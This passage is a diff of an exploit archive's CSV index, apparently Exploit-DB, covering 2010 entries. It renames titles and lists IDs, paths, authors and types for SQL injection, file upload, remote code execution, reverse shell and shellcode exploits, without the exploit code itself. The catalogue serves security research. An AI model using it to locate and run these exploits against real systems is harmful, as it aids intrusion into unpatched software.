id,file,description,date,author,platform,type,port 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 -14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) - Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 +14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0 14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 @@ -12972,7 +12973,7 @@ id,file,description,date,author,platform,type,port 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 -14830,platforms/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 +14830,platforms/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 @@ -13005,17 +13006,17 @@ id,file,description,date,author,platform,type,port 14886,platforms/windows/remote/14886.py,"Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 -14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 +14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14887,platforms/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 -14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent Cross-Site Scripting Exploit",2010-09-04,"Ptrace Security",php,webapps,0 +14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",php,webapps,0 14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0 14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 - '.xspf' smb:// URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 -14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 +14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0 @@ -13025,7 +13026,7 @@ id,file,description,date,author,platform,type,port 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 -14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - SEH Buffer Overflow Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 +14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 @@ -13055,7 +13056,7 @@ id,file,description,date,author,platform,type,port 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 - (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 -14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 +14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0 14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80 @@ -13066,7 +13067,7 @@ id,file,description,date,author,platform,type,port 14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 -14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules NULL Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 +14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 @@ -13120,7 +13121,7 @@ id,file,description,date,author,platform,type,port 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - SEH Overflow (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0 -15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload",2010-09-19,Net.Edit0r,php,webapps,0 +15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0 15100,platforms/win_x86/webapps/15100.txt,"Joomla Component (com_elite_experts) - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,linux,dos,0 @@ -13182,7 +13183,7 @@ id,file,description,date,author,platform,type,port 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0 -15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Bypass Authentication by SQL Injection",2010-09-28,Abysssec,php,webapps,0 +15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0 @@ -13196,7 +13197,7 @@ id,file,description,date,author,platform,type,port 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 -15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - File Upload Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0 +15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0 @@ -13209,8 +13210,8 @@ id,file,description,date,author,platform,type,port 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 -15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (Python)",2010-10-04,ZoRLu,asp,webapps,0 -15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 +15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0 +15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 @@ -13225,18 +13226,18 @@ id,file,description,date,author,platform,type,port 15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 -15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' NULL Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 +15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15208,platforms/php/webapps/15208.txt,"CuteNews - 'index.php?page' Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 15213,platforms/asp/remote/15213.pl,"ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 -15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations - NULL Pointer Dereference Remote Denial of Service",2010-10-06,d0lc3,win_x86,dos,19813 +15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service",2010-10-06,d0lc3,win_x86,dos,19813 15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) - Resource Exhaustion / Remote ftpd-anon",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 -15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Remote File Upload",2010-10-07,KnocKout,php,webapps,0 +15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 @@ -13249,7 +13250,7 @@ id,file,description,date,author,platform,type,port 15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG - User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 +15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - file download",2010-11-22,Beach,jsp,webapps,0 @@ -13285,7 +13286,7 @@ id,file,description,date,author,platform,type,port 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,php,webapps,0 15608,platforms/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",windows,dos,0 -15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure Exploit (Python)",2010-10-16,ZoRLu,aix,dos,0 +15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,aix,dos,0 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 @@ -13295,7 +13296,7 @@ id,file,description,date,author,platform,type,port 15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 15265,platforms/asp/remote/15265.rb,"ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce",2010-10-17,"Hernan Ochoa",windows,remote,0 -15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0 +15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 @@ -13367,17 +13368,17 @@ id,file,description,date,author,platform,type,port 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0 -15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0 +15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0 -15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 +15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0 -15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal Exploit",2010-10-31,"Yakir Wizman",windows,remote,0 +15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 @@ -13420,14 +13421,14 @@ id,file,description,date,author,platform,type,port 15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",windows,dos,0 -15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption Exploit",2010-11-04,ryujin,windows,remote,0 +15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) - SQL Injection",2010-11-05,FL0RiX,php,webapps,0 -15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 +15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 @@ -13557,7 +13558,7 @@ id,file,description,date,author,platform,type,port 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 -15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 +15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 15620,platforms/linux/local/15620.sh,"SystemTap - Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 @@ -13565,7 +13566,7 @@ id,file,description,date,author,platform,type,port 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Permanent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 -15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow Exploit (SEH)",2010-11-28,0v3r,windows,local,0 +15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - '.m3u' Denial of Service",2010-11-28,anT!-Tr0J4n,windows,dos,0 15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 @@ -13576,7 +13577,7 @@ id,file,description,date,author,platform,type,port 15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)",2010-11-30,0v3r,windows,dos,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 - Persistent Cross-Site Scripting",2010-11-30,"Shichemt Alen",php,webapps,0 -15638,platforms/php/webapps/15638.txt,"Duhok Forum 1.1 - Remote File Upload",2010-11-30,BrOx-Dz,php,webapps,0 +15638,platforms/php/webapps/15638.txt,"Duhok Forum 1.1 - Arbitrary File Upload",2010-11-30,BrOx-Dz,php,webapps,0 15639,platforms/php/webapps/15639.txt,"Pandora Fms 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 15640,platforms/php/webapps/15640.txt,"Pandora Fms 3.1 - OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 @@ -13588,7 +13589,7 @@ id,file,description,date,author,platform,type,port 15646,platforms/php/webapps/15646.txt,"DynPG 